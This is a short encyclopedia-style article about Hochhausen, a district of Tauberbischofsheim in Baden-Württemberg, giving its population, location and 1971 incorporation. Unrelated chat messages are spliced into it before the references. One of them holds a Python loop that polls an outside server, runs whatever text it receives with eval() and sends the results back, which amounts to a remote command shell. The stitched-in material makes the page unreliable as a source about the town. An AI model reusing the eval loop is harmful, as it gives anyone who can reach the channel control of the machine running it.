Hochhausen (Tauberbischofsheim)

Hochhausen is a district of Tauberbischofsheim with 712 residents.[1]

Hochhausen
Stadtteil of Tauberbischofsheim
Location of Hochhausen
Hochhausen
Hochhausen
Coordinates: 49.6621°N 9.6353°E / 49.6621; 9.6353
CountryGermany
StateBaden-Württemberg
DistrictMain-Tauber-Kreis
TownTauberbischofsheim
Time zoneCET/CEST (UTC+1/+2)
Postal codes
97941
Dialling codes09341
Vehicle registrationTBB

Geography

Hochhausen is located north-northwest of Tauberbischofsheim in the Tauberfranken region of Franconia.[1]

History

Hochhausen is one of seven districts of Tauberbischofsheim. The other districts are the town of Tauberbischofsheim, as well as Dienstadt, Distelhausen, Dittigheim, Dittwar and Impfingen.[1]

Hochhausen was incorporated to Tauberbischofsheim during the local government reform in Baden-Württemberg on January 1, 1971.[1]

Further reading

  • Corinna Egerer, Michael Latzel: Tauberbischofsheim. Fränkische Nachrichten, Tauberbischofsheim 2005, ISBN 3-924780-48-X, S. 148–161 (Kapitel: „Stadtteile“ Tauberbischofsheims) (german).
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
gollark: I was thinking about this, but I don't actually have all the hashes of all the disks in circulation.
gollark: It has some great new features now, like long polling mode.
gollark: You mean SPUDNET? I think I may have broken that URL in the osmarks.net migration. Use spudnet.osmarks.net.

References

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.